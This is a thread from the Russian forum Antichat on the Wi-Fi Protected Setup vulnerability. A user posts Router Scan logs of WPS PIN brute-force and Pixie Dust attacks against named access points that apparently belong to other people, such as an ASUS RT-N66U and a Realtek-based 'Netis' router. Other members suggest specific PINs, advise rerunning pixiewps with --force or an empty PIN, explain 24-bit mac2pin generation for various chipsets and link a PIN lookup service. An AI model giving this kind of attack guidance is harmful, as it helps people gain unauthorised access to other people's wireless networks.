Antichat — официальный сайт

Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. Rahmon

    Rahmon Member

    Joined:
    8 Nov 2017
    Messages:
    14
    Likes Received:
    6
    Reputations:
    0
    Помогите пожалуйста...
    [*] Audit started at 2018.05.21 15:40:45 (UTC+05:00).
    [*] Associating with AP...
    [+] Associated with BC:EE:7B:34:d6:58 (ESSID: BOYGONY).
    [*] Trying pin "00681278"...
    [*] Sending EAPOL Start...
    [-] Request timed out.
    [*] Trying pin "00681278"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 1B7756FA8F6E55BA33E52E83712A6EC4
    [*] PKE: 635135EE29AEF97782690DE6871D5F7F3E4F9AC67DB81DFB93152F0ABE1B2C6E8F82F3CA611EAD6AB34F73634CE5BA841BA22A68347B5B160A123F111149E62861C53ED25088B18767193991887615ECBA46DEBA4CA58F5CE96A4CCAE7974652BBACE9C6C930D96121690B2D8C4F5C3419063B86D637970157A92EA36C1F9AB44EA5B12EF9A150D53CAA9BF643246D6ADD3B0360EE75B738BD7B53291ED4EB4F53B4679A10570D3A7C874CD1B2EF314E79E129E21CA9E13C43AD663637556728
    [*] Manufacturer: ASUSTeK Computer Inc.
    [*] Model Name: Wi-Fi Protected Setup Router
    [*] Model Number: RT-N66U
    [*] Serial Number: bc:ee:7b:34:d6:58
    [*] Device Name: RT-N66U
    [*] Sending WPS Message M2...
    [*] PKR: 97B9803CC4BBBC8F8FBED71237080C3B5BED564A64B4DC07861C2409E92D38D03B1568058625D1F34D9B6B22245C1004F84DBEEE9F96F63A758852A3782DF9BCA9C4C3B7CBB9BBF27EF1B89367633EC36E67998D1CEAE55771F5F608795A8820B34C6B00850F3EAA3B8E6588AF472B08CE223FB073B483ACA20B9193CCAFD67B0C71E92BDC4E1512489D9C71ED3C7F78B720CFE492BC559E977E66661DE1929B8322E0778DEA98177420A66C5AA3D572478101F2A4BCED8F3DD5AC20C94C2F4E
    [*] AuthKey: 7B7A448F542F76ED4FC38E47AD9E0DDB3024663C770771BBA02BACE2A9A6A009
    [*] Received WPS Message M3.
    [*] E-Hash1: 7BC1382BDF8AA8606F494202D812834FAA817AACAE342F45A3FE69F182A8198F
    [*] E-Hash2: 1F5EC2E3E4AB8EB4248D40E0866585DA5555D29AAF6E7212AA8AA3F6C06DBE74
    [*] Sending WPS Message M4...
    [*] Received WSC NACK.
    [-] Error: Wrong PIN code.
    [*] EAP session closed.
    [*] Starting Pixie Dust attack...
    [*] Audit stopped at 2018.05.21 15:41:40 (UTC+05:00).
    [-] Pixie Dust PIN not found.
     
    1. DSL2650NRU

      DSL2650NRU Well-Known Member

      Joined:
      12 Apr 2016
      Messages:
      466
      Likes Received:
      306
      Reputations:
      1
      66122067
       
      Rahmon likes this.
      1. Rahmon

        Rahmon Member

        Joined:
        8 Nov 2017
        Messages:
        14
        Likes Received:
        6
        Reputations:
        0
        Спасибо большое. Вот ещё
        [*] Audit started at 2018.05.22 02:15:12 (UTC+05:00).
        [*] Associating with AP...
        [+] Associated with 04:8D:38:4F:A2:EA (ESSID: Netis 2.4G).
        [*] Trying pin "86250320"...
        [*] Sending EAPOL Start...
        [*] Received Identity Request.
        [*] Sending Identity Response...
        [*] Received WPS Message M1.
        [*] E-Nonce: 5BAD179821EC77800471CB2F4CC85249
        [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
        [*] Manufacturer: Realtek Semiconductor Corp.
        [*] Model Name: RTL8xxx
        [*] Model Number: EV-2010-09-20
        [*] Serial Number: 123456789012347
        [*] Device Name: RTK_AP
        [*] Sending WPS Message M2...
        [*] PKR: 40EFC4A45E5A1EC75F288BEE4BE275FD32CCAE023F85D8276C3242DC98DFE86A58C14964765B57DB1CD15EB473418D15CF2216155011F8C86C9E343111F798CDDE166A36C5297D27421181F64C20B514D987687AB3BD357C58558C7D7EEE3D5E00BDD04A9BA361E74803E27BCAE595CF1D86EB6CE943AB0F41497A570AAE2B1F82F47DF9756EAE517E3E0CC7604336B30D06B4587EAAB001DAAA287DE4C43573890A0E1B909D850559605B14315E5CCD7A133CFE7595A8182DEB763834A81396
        [*] AuthKey: F9CFD488D64161FB24A84E685EDD050A157B31CFE2CEE80F834E471C03B75760
        [*] Received WPS Message M3.
        [*] E-Hash1: 2723341D7A519D6BCFA6D367F4EC496C3C95C7A128C0A5F77FFBEC913772C4CC
        [*] E-Hash2: 2723341D7A519D6BCFA6D367F4EC496C3C95C7A128C0A5F77FFBEC913772C4CC
        [*] This AP is potentially vulnerable to the "empty string" pin.
        [*] To specify <empty> pin, add empty line to PINs list and disable checksum calculation.
        [*] Also in this case the pin can have two same halfs (e.g. 00000000).
        [*] Sending WPS Message M4...
        [*] Received WSC NACK.
        [-] Error: Wrong PIN code.
        [*] Sending WSC NACK...
        [*] EAP session closed.
        [*] Starting Pixie Dust attack...
        [*] Audit stopped at 2018.05.22 02:15:22 (UTC+05:00).
         
        1. binarymaster

          binarymaster Elder - Старейшина

          Joined:
          11 Dec 2010
          Messages:
          4,717
          Likes Received:
          10,195
          Reputations:
          126
          Прочитай и осознай вот это.
           
          1. Rahmon

            Rahmon Member

            Joined:
            8 Nov 2017
            Messages:
            14
            Likes Received:
            6
            Reputations:
            0
            [*] Audit started at 2018.05.22 22:48:38 (UTC+05:00).
            [*] Associating with AP...
            [+] Associated with 04:8D:38:4F:A2:EA (ESSID: Netis 2.4G).
            [*] Trying pin ""...
            [*] Sending EAPOL Start...
            [*] Received Identity Request.
            [*] Sending Identity Response...
            [*] Received WPS Message M1.
            [*] E-Nonce: 4DCFBDE762CA4BB7355BCCAF31D1D4D2
            [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
            [*] Manufacturer: Realtek Semiconductor Corp.
            [*] Model Name: RTL8xxx
            [*] Model Number: EV-2010-09-20
            [*] Serial Number: 123456789012347
            [*] Device Name: RTK_AP
            [*] Sending WPS Message M2...
            [*] PKR: 323855877FA97B6BDDD6FFE4D4771754798A3BDCE786D1A6B92FEFEBF8B7F765DDB3D46D5282277308EA041E56C87FEF681A13FFF0F6C5F251C68B1C5C6DFD0A0FC3BDF958F1EE1663F45541D4614257A2A853347DF00D0E59D0CC40038D5BAA1CC23410BD2B06B7B76042F894BC69BB912C8EA36256E9A54C9DE5E33FD2956EE8D75E464B811D8C08642B2C5E909690425AD54C37DE6B9DBFD72627C03427FCDC57AA59472D0018163E0B6B1B02120D4316B2F22F330CE6C337AD8C1C3EFD78
            [*] AuthKey: 18D88215B9F432923B87A8886EDC676126172250A22C8DC2EE9CBAC7EBE22DDF
            [*] Received WPS Message M3.
            [*] E-Hash1: 090A23C2D8B406248711F723E65E60B12682B923F42FBEC224D2F26AA4E00EBD
            [*] E-Hash2: 090A23C2D8B406248711F723E65E60B12682B923F42FBEC224D2F26AA4E00EBD
            [*] Sending WPS Message M4...
            [*] Received WSC NACK.
            [-] Error: Wrong PIN code.
            [*] Sending WSC NACK...
            [*] EAP session closed.
            [*] Starting Pixie Dust attack...
            [*] The AP /might be/ vulnerable.
            [*] Try again with --force or with another (newer) set of data.
            [*] Also ensure that the date time and time zone on your computer are set correctly.
            [*] Audit stopped at 2018.05.22 22:49:03 (UTC+05:00).
            [*] Audit started at 2018.05.22 22:49:57 (UTC+05:00).
            [*] Associating with AP...
            [+] Associated with 04:8D:38:4F:A2:EA (ESSID: Netis 2.4G).
            [*] Trying pin ""...
            [*] Sending EAPOL Start...
            [*] Received Identity Request.
            [*] Sending Identity Response...
            [*] Received WPS Message M1.
            [*] E-Nonce: 75F440237407301C29E6E2C416FE9E9A
            [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
            [*] Manufacturer: Realtek Semiconductor Corp.
            [*] Model Name: RTL8xxx
            [*] Model Number: EV-2010-09-20
            [*] Serial Number: 123456789012347
            [*] Device Name: RTK_AP
            [*] Sending WPS Message M2...
            [*] PKR: A03834310445FF4CEC466C749837E4817ACDAC9FE7D7681969918855CEE1143CE0C8FC06BE7BC60F87C68EE60E4D8683E3D6FF5C48D4DD02826338E2B47925CE5E986DF5F44E011540032F434D6290B635720B67FCB9B48B659D4904C5BEC01C10492352E62AD4D37C805DFD930F1F03C9B65E0F6EC3F8CAD07E53C37C5D955DEFBE04CE223F02776DCCF47578553299651A172690FAE5735FD28B4475B7452824E41BF1E80CEA69D62373D354160DD7FDAD810A153FDBA70830F5B10D2BD081
            [*] AuthKey: B665DDCD433499519FC3A5A22ADC20256793DC490DA6D4B6E5AE800FD79F44D2
            [*] Received WPS Message M3.
            [*] E-Hash1: B0E40E40E042E20901D769D2B35F3D005667855C9FB98C63F1F8D72B90369297
            [*] E-Hash2: B0E40E40E042E20901D769D2B35F3D005667855C9FB98C63F1F8D72B90369297
            [*] Sending WPS Message M4...
            [*] Received WSC NACK.
            [-] Error: Wrong PIN code.
            [*] Sending WSC NACK...
            [*] EAP session closed.
            [*] Starting Pixie Dust attack...
            [*] The AP /might be/ vulnerable.
            [*] Try again with --force or with another (newer) set of data.
            [*] Also ensure that the date time and time zone on your computer are set correctly.
            [*] Audit stopped at 2018.05.22 22:50:22 (UTC+05:00).
            [*] Audit started at 2018.05.22 22:53:15 (UTC+05:00).
            [*] Associating with AP...
            [+] Associated with 04:8D:38:4F:A2:EA (ESSID: Netis 2.4G).
            [*] Trying pin ""...
            [*] Sending EAPOL Start...
            [*] Received Identity Request.
            [*] Sending Identity Response...
            [*] Received WPS Message M1.
            [*] Manufacturer: Realtek Semiconductor Corp.
            [*] Model Name: RTL8xxx
            [*] Model Number: EV-2010-09-20
            [*] Serial Number: 123456789012347
            [*] Device Name: RTK_AP
            [*] Sending WPS Message M2...
            [*] Received WPS Message M3.
            [*] Sending WPS Message M4...
            [*] Received WSC NACK.
            [-] Error: Wrong PIN code.
            [*] Sending WSC NACK...
            [*] EAP session closed.
            [*] Associating with AP...
            [+] Associated with 04:8D:38:4F:A2:EA (ESSID: Netis 2.4G).
            [*] Audit stopped at 2018.05.22 22:53:31 (UTC+05:00).
             
            1. DSL2650NRU

              DSL2650NRU Well-Known Member

              Joined:
              12 Apr 2016
              Messages:
              466
              Likes Received:
              306
              Reputations:
              1
              The AP /might be/ vulnerable.
              Try again with --force or with another (newer) set of data - означает пробуй пикси с --force. Также можно проверить с пустым пином роутерсканом. На всякий случай
               
              #4366 DSL2650NRU, 22 May 2018
              Last edited: 22 May 2018
              1. binarymaster

                binarymaster Elder - Старейшина

                Joined:
                11 Dec 2010
                Messages:
                4,717
                Likes Received:
                10,195
                Reputations:
                126
                Тогда попробуй ещё с нулями... хотя конечно лучше прогнать pixiewps в --force режиме.
                С пустым он уже попробовал.
                 
                1. Rahmon

                  Rahmon Member

                  Joined:
                  8 Nov 2017
                  Messages:
                  14
                  Likes Received:
                  6
                  Reputations:
                  0
                  в RS попробовать или загрузится с linux?
                   
                  1. Rahmon

                    Rahmon Member

                    Joined:
                    8 Nov 2017
                    Messages:
                    14
                    Likes Received:
                    6
                    Reputations:
                    0
                    Ваш предлагаемый пин не сработал. 66122067
                    [*] Audit started at 2018.05.23 12:11:11 (UTC+05:00).
                    [*] Associating with AP...
                    [-] Association failed.
                    [*] Associating with AP...
                    [-] Association failed.
                    [*] Associating with AP...
                    [+] Associated with BC:EE:7B:34:d6:58 (ESSID: BOYGONY).
                    [*] Trying pin "66122067"...
                    [*] Sending EAPOL Start...
                    [*] Received Identity Request.
                    [*] Sending Identity Response...
                    [*] Received WPS Message M1.
                    [*] E-Nonce: 4E7B69106D8D09308246EF2B45B7E7B4
                    [*] PKE: D597BF310CDB0B30FD7A475A7AADB1E2D0FAC14208100A7C2B793B104A801DD692574CB4707978D767B587F3A082134857470D21E41E7CA388ACEA87742DE118A22B13FC57A44326B11D3806200B14194F582CA2A2C132A75E6BF098FE6BB31DB7782D87519AF85AE59A352D17BF1CE52A7767123BE14C8E36B4E0AC6208B32696698AAE331491CF6E03C8B091ACD5971370E4C5F3E02A94C012816A8E7520530BF05965268250F7EDECE1B105BFEBD7AB0D8484BB36B113E48EB61A3051CF42
                    [*] Manufacturer: ASUSTeK Computer Inc.
                    [*] Model Name: Wi-Fi Protected Setup Router
                    [*] Model Number: RT-N66U
                    [*] Serial Number: bc:ee:7b:34:d6:58
                    [*] Device Name: RT-N66U
                    [*] Sending WPS Message M2...
                    [*] PKR: 8CEC70FBA93402CCB4B65E2483B682AC25D29AF624AE9732FC06482A4CEC35AE77D67117AB7E5B6040EFA37F72E7D8A7F0D6BABC63A4FEC621F25F0320A062447249CFC03E82E79C08075BC9F49CA53E3F65E6AA4F00010A355EAA30DB5671369EBFB35CDC5334688FF03ECE11E39D7D9817AB96B8FF105C56EDFD25AD4152CCD9F3B9019F95965683B621692A6865186F76C0F2E7441D97826B414B968B4826B2814478DF1C27467E3A9CC4878FAB8B18CC9A3F965895F344E269CC350294AD
                    [*] AuthKey: DFA0A948605D9A689A073A4D09DF31C731E5634A504E8DF906A6E752624F7744
                    [*] Received WPS Message M3.
                    [*] E-Hash1: AAA666F4446E68D1AB4B6D14D86007EFFBDFAB7A7E8C7C42FD85F0757CEA46EF
                    [*] E-Hash2: CA9C4D8F5FDF49C5B77CAED37F7496ECE242DFF9D788A8F93D8834A5AF369768
                    [*] Sending WPS Message M4...
                    [*] Received WSC NACK.
                    [-] Error: Wrong PIN code.
                    [*] EAP session closed.
                    [*] Associating with AP...
                    [*] Starting Pixie Dust attack...
                    [+] Associated with BC:EE:7B:34:d6:58 (ESSID: BOYGONY).
                    [-] Pixie Dust PIN not found.
                    [*] Audit stopped at 2018.05.23 12:15:47 (UTC+05:00).
                     
                    1. binarymaster

                      binarymaster Elder - Старейшина

                      Joined:
                      11 Dec 2010
                      Messages:
                      4,717
                      Likes Received:
                      10,195
                      Reputations:
                      126
                      Без разницы. Но одно известно точно - у пина первая и вторая половины должны совпадать.
                       
                      1. DSL2650NRU

                        DSL2650NRU Well-Known Member

                        Joined:
                        12 Apr 2016
                        Messages:
                        466
                        Likes Received:
                        306
                        Reputations:
                        1
                        Алгоритм не известен
                         
                        Gashek likes this.
                        1. maus

                          maus Active Member

                          Joined:
                          30 May 2015
                          Messages:
                          405
                          Likes Received:
                          102
                          Reputations:
                          0
                          - а Дампер нашёл пин к TP-LINK.
                          [​IMG]
                           
                          1. WELK

                            WELK Member

                            Joined:
                            14 Jan 2017
                            Messages:
                            96
                            Likes Received:
                            8
                            Reputations:
                            0
                            Бо там RT2860 - Ralink
                             
                            binarymaster likes this.
                            1. maus

                              maus Active Member

                              Joined:
                              30 May 2015
                              Messages:
                              405
                              Likes Received:
                              102
                              Reputations:
                              0
                              - понятно, именно поэтому Роутер Скан ничего не показывает?
                              [​IMG]
                               
                              1. DSL2650NRU

                                DSL2650NRU Well-Known Member

                                Joined:
                                12 Apr 2016
                                Messages:
                                466
                                Likes Received:
                                306
                                Reputations:
                                1
                                24-bit PIN подходит для адсл тп-линков.
                                 
                                4Fun likes this.
                                1. DSL2650NRU

                                  DSL2650NRU Well-Known Member

                                  Joined:
                                  12 Apr 2016
                                  Messages:
                                  466
                                  Likes Received:
                                  306
                                  Reputations:
                                  1
                                  Выберите 24-bit PIN - покажет
                                   
                                  1. WELK

                                    WELK Member

                                    Joined:
                                    14 Jan 2017
                                    Messages:
                                    96
                                    Likes Received:
                                    8
                                    Reputations:
                                    0
                                    через пикси в роутер скане прогоните и тож покажет...
                                     
                                    1. TOX1C

                                      TOX1C Elder - Старейшина

                                      Joined:
                                      24 Mar 2012
                                      Messages:
                                      1,135
                                      Likes Received:
                                      1,931
                                      Reputations:
                                      24
                                      Гадалка в роутер скане смотрит на bssid а не на wps info теги, поэтому ничего и не показывает. На тп линк алгоритма нет. Дампер смотрит на то, что это rt2860 и подсказывает, что возможен их стандартный mac2pin, он же 24бит пин.
                                      Не для всех и не всегда, адсл вариантов есть 4 - стандартный на Ralnik rt63365, который вскрывается, новые медиатеки с другим алгоритмом, микро дсл с чипсетами броаком, которые хоть и адсл, но не вскрывались генераторами пин-кодов никогда, и еще есть вариант на микро дсл с мозгами broadcom, а wifi у него atheros, и мопед гордо о себе в wps info заявляет, что он не adsl модем, а TL-WA701N.
                                       
                                      quite gray, Triton_Mgn, WELK and 2 others like this.
                                      1. Kakoluk

                                        Kakoluk Banned

                                        Joined:
                                        14 Aug 2015
                                        Messages:
                                        514
                                        Likes Received:
                                        704
                                        Reputations:
                                        4
                                        https://3wifi.stascorp.com/wpspin
                                         
                                        Slayer likes this.
                                        1. binarymaster

                                          binarymaster Elder - Старейшина

                                          Joined:
                                          11 Dec 2010
                                          Messages:
                                          4,717
                                          Likes Received:
                                          10,195
                                          Reputations:
                                          126
                                          Вскрываются pixie dust из Router Scan, если конечно WPS включён.
                                           
                                          Slayer and user100 like this.